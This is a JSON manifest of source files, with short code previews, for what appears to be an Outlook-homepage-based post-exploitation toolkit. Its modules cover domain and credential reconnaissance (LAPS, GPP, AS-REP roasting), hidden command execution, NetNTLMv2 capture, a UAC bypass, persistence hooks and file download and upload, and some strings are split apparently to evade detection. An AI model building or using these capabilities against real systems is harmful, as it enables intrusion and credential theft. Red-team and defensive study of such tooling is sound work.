"path": "functions/enumerate/host/list_boottime.py",
"chars": 566,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_boottime.txt",
"chars": 703,
"preview": "Function list_boottime()\r\n On error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"W"
},
{
"path": "functions/enumerate/host/list_clipboard.py",
"chars": 489,
"preview": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self,"
},
{
"path": "functions/enumerate/host/list_clipboard.txt",
"chars": 256,
"preview": "Function list_clipboard()\r\n\tOn error resume next\r\n\tSet html = window.external.OutlookApplication.CreateObject(\"htmlfile\""
},
{
"path": "functions/enumerate/host/list_environmentvariables.py",
"chars": 1034,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_environmentvariables.txt",
"chars": 515,
"preview": "Function list_environmentvariables()\r\n\tOn error resume next\r\n\tlist_environmentvariables = list_environmentvariables & Ge"
},
{
"path": "functions/enumerate/host/list_gpp.py",
"chars": 1009,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_gpp.txt",
"chars": 1429,
"preview": "Function list_gpp()\n On error resume next\n Set sh = window.external.OutlookApplication.CreateObject(\"Wscript.Shell"
},
{
"path": "functions/enumerate/host/list_hostsfile.py",
"chars": 664,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_hostsfile.txt",
"chars": 478,
"preview": "Function list_hostsfile()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.F"
},
{
"path": "functions/enumerate/host/list_hotfixes.py",
"chars": 601,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_hotfixes.txt",
"chars": 537,
"preview": "Function list_hotfixes()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/host/list_installedapps.py",
"chars": 801,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_installedapps.txt",
"chars": 1497,
"preview": "Function list_installedapps()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject("
},
{
"path": "functions/enumerate/host/list_installeddotnet.py",
"chars": 1149,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_installeddotnet.txt",
"chars": 4091,
"preview": "Function list_installeddotnet()\r\n\tOn error resume next\r\n\tlist_installeddotnet = \"INSTALLED .NET VERSIONS:\" & vbCrLf\r\n\tx6"
},
{
"path": "functions/enumerate/host/list_installedpowershell.py",
"chars": 594,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_installedpowershell.txt",
"chars": 867,
"preview": "Function list_installedpowershell()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateO"
},
{
"path": "functions/enumerate/host/list_iprouting.py",
"chars": 948,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_iprouting.txt",
"chars": 1166,
"preview": "Function list_iprouting()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/host/list_localadmins.py",
"chars": 950,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_localadmins.txt",
"chars": 1140,
"preview": "Function list_localadmins()\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocat"
},
{
"path": "functions/enumerate/host/list_localusers.py",
"chars": 619,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_localusers.txt",
"chars": 1219,
"preview": "Function list_localusers()\r\n\ton error resume next\r\n\tSet sh = window.external.OutlookApplication.CreateObject(\"Wscript.Sh"
},
{
"path": "functions/enumerate/host/list_logging.py",
"chars": 720,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_logging.txt",
"chars": 2172,
"preview": "Function list_logging()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemS"
},
{
"path": "functions/enumerate/host/list_mappeddrives.py",
"chars": 515,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_mappeddrives.txt",
"chars": 559,
"preview": "Function list_mappeddrives()\r\n On error resume next\r\n Set objLocator = window.external.OutlookApplication."
},
{
"path": "functions/enumerate/host/list_networkcardinfo.py",
"chars": 535,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_networkcardinfo.txt",
"chars": 885,
"preview": "Function list_networkcardinfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObjec"
},
{
"path": "functions/enumerate/host/list_networklogon.py",
"chars": 649,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_networklogon.txt",
"chars": 912,
"preview": "Function list_networklogon()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\""
},
{
"path": "functions/enumerate/host/list_ntdomaininfo.py",
"chars": 579,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_ntdomaininfo.txt",
"chars": 835,
"preview": "Function list_ntdomaininfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\""
},
{
"path": "functions/enumerate/host/list_officearch.py",
"chars": 807,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_officearch.txt",
"chars": 465,
"preview": "Function list_officearch()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wb"
},
{
"path": "functions/enumerate/host/list_printers.py",
"chars": 465,
"preview": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self,"
},
{
"path": "functions/enumerate/host/list_printers.txt",
"chars": 427,
"preview": "Function list_printers()\r\n\tOn error resume next\r\n\tSet wsh = window.external.OutlookApplication.CreateObject(\"Wscript.Net"
},
{
"path": "functions/enumerate/host/list_processes.py",
"chars": 798,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_processes.txt",
"chars": 1030,
"preview": "Function list_processes()\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator"
},
{
"path": "functions/enumerate/host/list_recentcommands.py",
"chars": 1034,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_recentcommands.txt",
"chars": 266,
"preview": "Function list_recentcommands()\r\n\tOn error resume next\r\n\tlist_recentcommands = \"RECENT COMMANDS:\" & vbCrLf\r\n\tlist_recentc"
},
{
"path": "functions/enumerate/host/list_recentfiles.py",
"chars": 607,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_recentfiles.txt",
"chars": 651,
"preview": "Function list_recentfiles()\r\n\tOn error resume next\r\n\tConst MY_RECENT_DOCUMENTS = &H8&\r\n\trecentpaths = \"RECENT PATHS:\" & "
},
{
"path": "functions/enumerate/host/list_recyclebin.py",
"chars": 600,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_recyclebin.txt",
"chars": 1185,
"preview": "Function list_recyclebin()\r\n\tOn error resume next\r\n\tSet sa = window.external.OutlookApplication.CreateObject(\"Shell.Appl"
},
{
"path": "functions/enumerate/host/list_scheduledtasks.py",
"chars": 534,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_scheduledtasks.txt",
"chars": 4995,
"preview": "Function list_scheduledtasks()\r\n\tOn error resume next\r\n\tConst wbemFlagReturnImmediately = &h10\r\n\tConst wbemFlagForwardOn"
},
{
"path": "functions/enumerate/host/list_servicepermissions.py",
"chars": 1136,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_servicepermissions.txt",
"chars": 4018,
"preview": "Function list_servicepermissions()\r\n\t' ACE Types\r\n\r\n\tConst ACCESS_ALLOWED_ACE_TYPE = &h0\r\n\tConst ACCESS_DENIED_ACE_TYPE "
},
{
"path": "functions/enumerate/host/list_services.py",
"chars": 659,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_services.txt",
"chars": 546,
"preview": "Function list_services()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/host/list_startmenu.py",
"chars": 521,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_startmenu.txt",
"chars": 416,
"preview": "Function list_startmenu()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/host/list_timezone.py",
"chars": 764,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\nfrom lib.core.specmodule imp"
},
{
"path": "functions/enumerate/host/list_timezone.txt",
"chars": 388,
"preview": "Function list_timezone()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/host/list_whoami.py",
"chars": 1081,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_whoami.txt",
"chars": 3047,
"preview": "Function list_whoami()\r\n\ton error resume next\r\n\tSet objShell = window.external.OutlookApplication.CreateObject(\"WScript."
},
{
"path": "functions/enumerate/host/list_windowsarch.py",
"chars": 779,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_windowsarch.txt",
"chars": 476,
"preview": "Function list_windowsarch()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"W"
},
{
"path": "functions/enumerate/host/list_windowsversion.py",
"chars": 730,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_windowsversion.txt",
"chars": 515,
"preview": "Function list_windowsversion()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject"
},
{
"path": "functions/enumerate/ldap/ldap_query.py",
"chars": 3352,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,escapequotes\n\n\nclass Spec(Sp"
},
{
"path": "functions/enumerate/ldap/ldap_query.txt",
"chars": 1126,
"preview": "Function ldap_query()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScr"
},
{
"path": "functions/enumerate/ldap/list_addcomputertodomain.py",
"chars": 1109,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_addcomputertodomain.txt",
"chars": 2265,
"preview": "Function list_addcomputertodomain()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"S"
},
{
"path": "functions/enumerate/ldap/list_asreproast.py",
"chars": 768,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_asreproast.txt",
"chars": 1206,
"preview": "Function list_asreproast()\r\n\tOn error resume next\r\n\r\n\tConst DONT_REQUIRE_PREAUTH = 4194304\r\n\tSet objLocator = window.ext"
},
{
"path": "functions/enumerate/ldap/list_computer.py",
"chars": 1071,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_computer.txt",
"chars": 1459,
"preview": "Function list_computer()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/ldap/list_computers.py",
"chars": 567,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/ldap/list_computers.txt",
"chars": 1202,
"preview": "Function list_computers()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/ldap/list_domaininfo.py",
"chars": 587,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_domaininfo.txt",
"chars": 1169,
"preview": "Function list_domaininfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wb"
},
{
"path": "functions/enumerate/ldap/list_lapspassword.py",
"chars": 658,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_lapspassword.txt",
"chars": 1322,
"preview": "Function list_lapspassword()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\""
},
{
"path": "functions/enumerate/ldap/list_passwordnotrequired.py",
"chars": 755,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_passwordnotrequired.txt",
"chars": 1195,
"preview": "Function list_passwordnotrequired()\r\n\tOn error resume next\r\n\r\n\tConst PASSWD_NOTREQD = 32\r\n\tSet objLocator = window.exter"
},
{
"path": "functions/enumerate/ldap/list_passwordpolicy.py",
"chars": 713,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_passwordpolicy.txt",
"chars": 1472,
"preview": "Function list_passwordpolicy()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject"
},
{
"path": "functions/enumerate/ldap/list_user.py",
"chars": 959,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_user.txt",
"chars": 1443,
"preview": "Function list_user()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScri"
},
{
"path": "functions/enumerate/ldap/list_users.py",
"chars": 595,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_users.txt",
"chars": 1186,
"preview": "Function list_users()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScr"
},
{
"path": "functions/execute/host/application.py",
"chars": 1424,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/application.txt",
"chars": 286,
"preview": "Function Execute_Application()\r\n On Error Resume Next\r\n\tSet app = window.external.OutlookApplication.CreateObject({{c"
},
{
"path": "functions/execute/host/capture_netntlmv2.py",
"chars": 1759,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/capture_netntlmv2.txt",
"chars": 327,
"preview": "Function capture_netntlmv2()\r\n On Error Resume Next\r\n Set oHTTP = window.external.OutlookApplication.CreateObject("
},
{
"path": "functions/execute/host/cmd.py",
"chars": 854,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/cmd.txt",
"chars": 739,
"preview": "Function Execute_CMD()\n\tOn Error Resume Next\n\n\tConst HIDDEN_WINDOW = 0\n\tSet ws = window.external.OutlookApplication.Crea"
},
{
"path": "functions/execute/host/execute_excel4macro.py",
"chars": 1622,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/execute_excel4macro.txt",
"chars": 305,
"preview": "Function execute_excel4macro()\r\n On Error Resume Next\r\n Set excel = window.external.OutlookApplication.CreateObjec"
},
{
"path": "functions/execute/host/execute_registerxll.py",
"chars": 1023,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/execute_registerxll.txt",
"chars": 289,
"preview": "Function execute_registerxll()\r\n On Error Resume Next\r\n Set excel = window.external.OutlookApplication.CreateObjec"
},
{
"path": "functions/execute/host/migrate_homepage.py",
"chars": 1162,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/migrate_homepage.txt",
"chars": 379,
"preview": "Function Execute_MigrateHomepage()\r\n\tOn Error Resume Next\r\n\tversion = left(window.external.OutlookApplication.Version,4)"
},
{
"path": "functions/execute/host/remove_homepage.py",
"chars": 843,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/execute/host/remove_homepage.txt",
"chars": 1351,
"preview": "Function remove_homepage()\r\n\tOn Error Resume Next\r\n\tSet objContext = window.external.OutlookApplication.CreateObject(\"Wb"
},
{
"path": "functions/execute/host/set_calendarhomepagehook.py",
"chars": 1546,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/set_calendarhomepagehook.txt",
"chars": 401,
"preview": "Function set_calendarhomepagehook()\r\n\tOn Error Resume Next\r\n\tversion = left(window.external.OutlookApplication.Version,4"
},
{
"path": "functions/execute/host/spawnproc_explorer.py",
"chars": 1107,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/spawnproc_explorer.txt",
"chars": 363,
"preview": "Function Spawn_Explorer()\r\n On Error Resume Next\r\n\tset app = window.external.OutlookApplication.CreateObject(\"Shell.A"
},
{
"path": "functions/execute/host/uac-sdclt.py",
"chars": 1330,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/uac-sdclt.txt",
"chars": 1325,
"preview": "Function Execute_UAC_sdclt()\n\tOn Error Resume Next\n\tExecute_UAC_sdclt = \"SDCLT UAC BYPASS\" & vbCrLf\n\tExecute_UAC_sdclt ="
},
{
"path": "functions/execute/host/wmi_execute.py",
"chars": 980,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wmi_execute.txt",
"chars": 546,
"preview": "Function Execute_WMICommand()\r\n On Error Resume Next\r\n Set objLocator = window.external.OutlookApplication.CreateO"
},
{
"path": "functions/execute/host/wmi_killprocname.py",
"chars": 1041,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wmi_killprocname.txt",
"chars": 595,
"preview": "Function KillProc_Name()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/execute/host/wmi_killprocpid.py",
"chars": 878,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wmi_killprocpid.txt",
"chars": 594,
"preview": "Function KillProc_PID()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemS"
},
{
"path": "functions/execute/host/wscriptshell.py",
"chars": 827,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wscriptshell.txt",
"chars": 376,
"preview": "Function Execute_WscriptShell()\r\n\tOn Error Resume Next\r\n\tConst HIDDEN_WINDOW = 0\r\n\tSet ws = window.external.OutlookAppli"
},
{
"path": "functions/operation/file/cat_file.py",
"chars": 1453,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\nfrom lib.validators"
},
{
"path": "functions/operation/file/cat_file.txt",
"chars": 386,
"preview": "Function cat_file()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSys"
},
{
"path": "functions/operation/file/check_filearch.py",
"chars": 778,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/check_filearch.txt",
"chars": 1416,
"preview": "Function check_filearch()\n On Error Resume Next \n Set BinaryStream = window.external.OutlookApplication.CreateO"
},
{
"path": "functions/operation/file/check_fileexist.py",
"chars": 726,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/check_fileexist.txt",
"chars": 324,
"preview": "Function check_fileexist()\r\n\tOn error resume next\r\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripti"
},
{
"path": "functions/operation/file/check_filehash.py",
"chars": 966,
"preview": "from lib.core.specmodule import SpecModule\r\nfrom lib.modhandlers.generic import quotedstring\r\n\r\nclass Spec(SpecModule):\r"
},
{
"path": "functions/operation/file/check_filehash.txt",
"chars": 732,
"preview": "Function check_filehash()\r\n On Error Resume Next \r\n set oMD5 = window.external.OutlookApplication.CreateObject("
},
{
"path": "functions/operation/file/copy_dir.py",
"chars": 1023,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/copy_dir.txt",
"chars": 616,
"preview": "Function copy_dir()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.Fil"
},
{
"path": "functions/operation/file/copy_file.py",
"chars": 924,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/copy_file.txt",
"chars": 571,
"preview": "Function copy_file()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.Fi"
},
{
"path": "functions/operation/file/create_dir.py",
"chars": 855,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/create_dir.txt",
"chars": 106,
"preview": "Function create_dir()\r\n On error resume next\r\n create_dir = dir_creator({{directory}})\r\nEnd Function"
},
{
"path": "functions/operation/file/create_shortcut.py",
"chars": 3178,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makeint,escapequotes\nfrom li"
},
{
"path": "functions/operation/file/create_shortcut.txt",
"chars": 552,
"preview": "Function create_shortcut()\r\n On error resume next\r\n Set objShell = window.external.OutlookApplication.CreateObject"
},
{
"path": "functions/operation/file/delete_dir.py",
"chars": 850,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/delete_dir.txt",
"chars": 551,
"preview": "Function delete_dir()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.F"
},
{
"path": "functions/operation/file/delete_file.py",
"chars": 699,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/delete_file.txt",
"chars": 436,
"preview": "Function delete_file()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.File"
},
{
"path": "functions/operation/file/download_filehttp.py",
"chars": 1353,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/download_filehttp.txt",
"chars": 694,
"preview": "Function download_filehttp()\r\n\tOn error resume next\r\n\tSet oHTTP = window.external.OutlookApplication.CreateObject(\"MSX\" "
},
{
"path": "functions/operation/file/get_file.py",
"chars": 3722,
"preview": "import math\nimport copy\nimport traceback\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import "
},
{
"path": "functions/operation/file/get_file.txt",
"chars": 242,
"preview": "Function get_file()\r\n\tOn Error Resume Next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSys"
},
{
"path": "functions/operation/file/list_acl.py",
"chars": 827,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/list_acl.txt",
"chars": 3495,
"preview": "Function list_acl()\n ' ACE Types\n\tConst ACCESS_ALLOWED_ACE_TYPE = &h0\n\tConst ACCESS_DENIED_ACE_TYPE = &h1\n\n\t' Base A"
},
{
"path": "functions/operation/file/list_dir.py",
"chars": 4870,
"preview": "from lib.core.specmodule import SpecModule\r\nfrom lib.modhandlers.generic import quotedstring,makebool,makeint\r\nfrom lib."
},
{
"path": "functions/operation/file/list_dir.txt",
"chars": 204,
"preview": "Function list_dir()\r\n\tOn error resume next\r\n list_dir = dir_lister({{directory}}, {{depth}}, {{recurselevels}}, {{fil"
},
{
"path": "functions/operation/file/list_shortcutinfo.py",
"chars": 671,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/list_shortcutinfo.txt",
"chars": 965,
"preview": "Function list_shortcutinfo()\r\n On error resume next\r\n Set objShell = window.external.OutlookApplication.CreateObje"
},
{
"path": "functions/operation/file/move_file.py",
"chars": 972,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/move_file.txt",
"chars": 391,
"preview": "Function move_file()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.Fi"
},
{
"path": "functions/operation/file/put_file.py",
"chars": 5372,
"preview": "import math\nimport copy\nimport os\nimport traceback\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.gener"
},
{
"path": "functions/operation/file/put_file.txt",
"chars": 187,
"preview": "Function put_file()\n\tSet fso = window.external.OutlookApplication.CreateObject(\"Scripting.FileSystemObject\")\n\tSet File ="
},
{
"path": "functions/operation/file/split_file.py",
"chars": 2088,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makeint\nfrom lib.validators."
},
{
"path": "functions/operation/file/split_file.txt",
"chars": 2066,
"preview": "Function split_file()\r\n\ton error resume next\r\n\tSet oFSO = window.external.OutlookApplication.CreateObject(\"Scripting.Fil"
},
{
"path": "functions/operation/file/zip_content.py",
"chars": 1436,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/zip_content.txt",
"chars": 2960,
"preview": "Function zip_content()\n\ton error resume next\n\tSet oFSO = window.external.OutlookApplication.CreateObject(\"Scrip\" & \"ting"
},
{
